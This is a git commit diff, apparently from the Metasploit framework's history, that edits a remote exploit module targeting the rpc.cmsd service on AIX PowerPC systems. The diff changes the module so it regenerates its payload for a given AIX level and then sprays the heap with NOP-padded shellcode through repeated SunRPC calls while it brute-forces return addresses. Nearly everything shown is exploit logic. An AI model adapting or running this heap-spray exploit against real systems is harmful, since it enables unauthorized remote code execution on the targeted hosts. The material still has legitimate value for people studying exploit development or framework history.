Regenerate the payload with the specified AIX level
git-svn-id: file:///home/svn/framework3/trunk@8424 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
36c61ff5ed
commit
af978cbbdc
|
@ -56,9 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
{
|
||||
'Arch' => 'ppc',
|
||||
'Platform' => 'aix',
|
||||
'Ret' => 0xcafebabe,
|
||||
'AIX' => '5.1',
|
||||
'Payload' => { 'AIX' => '5.1' },
|
||||
'Bruteforce' =>
|
||||
{
|
||||
#'Start' => { 'Ret' => 0x20230168 },
|
||||
|
@ -76,6 +74,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def brute_exploit(brute_target)
|
||||
|
||||
if not @aixpayload
|
||||
datastore['AIX'] = target['AIX']
|
||||
@aixpayload = regenerate_payload.encoded
|
||||
end
|
||||
|
||||
print_status("Trying to exploit rpc.cmsd with address 0x%x ..." % brute_target['Ret'])
|
||||
|
||||
begin
|
||||
|
@ -84,8 +87,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
# spray the heap a bit (work around powerpc cache issues)
|
||||
buf = make_nops(1024 - payload.encoded.length)
|
||||
buf << payload.encoded
|
||||
buf = make_nops(1024 - @aixpayload.length)
|
||||
buf << @aixpayload
|
||||
xdr = XDR.encode(buf, buf)
|
||||
10.times {
|
||||
sunrpc_call(7, xdr, 2)
|
||||
|
@ -111,3 +114,4 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
end
|
||||
|
||||
|
|
Loading…
Reference in New Issue